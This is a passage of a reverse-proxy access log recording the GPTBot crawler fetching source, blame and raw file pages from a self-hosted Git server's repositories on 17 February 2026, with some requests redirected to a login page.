+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" -[17/Feb/2026:16:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" -[17/Feb/2026:16:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" -[17/Feb/2026:16:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=source" [Client 74.7.227.38] [Length 14707] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:16:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11078] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:38:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11617] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:16:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9762] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12801] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" -[17/Feb/2026:16:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" -[17/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" -[17/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11044] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14447] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" -[17/Feb/2026:16:38:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:38:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" -[17/Feb/2026:16:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" -[17/Feb/2026:16:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" -[17/Feb/2026:16:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11538] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" -[17/Feb/2026:16:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" -[17/Feb/2026:16:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11538] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" -[17/Feb/2026:16:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" -[17/Feb/2026:16:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11539] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" -[17/Feb/2026:16:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" -[17/Feb/2026:16:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" -[17/Feb/2026:16:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" -[17/Feb/2026:16:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" -[17/Feb/2026:16:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" -[17/Feb/2026:16:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" -[17/Feb/2026:16:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" -[17/Feb/2026:16:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" -[17/Feb/2026:16:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" -[17/Feb/2026:16:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" -[17/Feb/2026:16:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=all" [Client 74.7.227.38] [Length 8472] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:16:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37225] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=source" [Client 74.7.227.38] 